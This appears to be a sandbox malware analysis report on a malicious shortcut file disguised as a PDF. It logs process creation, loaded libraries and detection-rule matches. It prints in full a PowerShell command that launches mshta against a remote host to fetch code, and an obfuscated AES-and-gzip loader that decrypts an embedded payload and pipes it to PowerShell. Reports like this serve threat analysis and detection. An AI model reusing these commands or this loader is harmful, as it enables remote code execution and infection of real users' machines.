Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.evad.winLNK@28/71@3/2

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2C7AD0 FormatMessageA,GetLastError,

21_2_00007FF6BB2C7AD0

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB2AAA80 CoCreateInstance,

21_2_00007FF6BB2AAA80

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB28D100 GetProcAddress,FreeLibrary,FindResourceA,SizeofResource,LoadResource,LockResource,

21_2_00007FF6BB28D100

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\x64dbg2[1]

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8132:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qiee3nuo.crw.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module vi

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: filepdf.pdf.lnk.download.lnk

ReversingLabs: Detection: 34%

Source: putty.exe	String found in binary or memory: config-serial-stopbits
Source: putty.exe	String found in binary or memory: config-address-family
Source: putty.exe	String found in binary or memory: config-ssh-portfwd-address-family

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')http://ukr-netdigitalhub.pro/x64dbg2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt \| powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1636,i,4196166615236883836,1689769362515970507,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putty.exe "C:\Users\user~1\AppData\Local\Temp\putty.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt \| powershell -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putty.exe "C:\Users\user~1\AppData\Local\Temp\putty.exe"	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1636,i,4196166615236883836,1689769362515970507,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
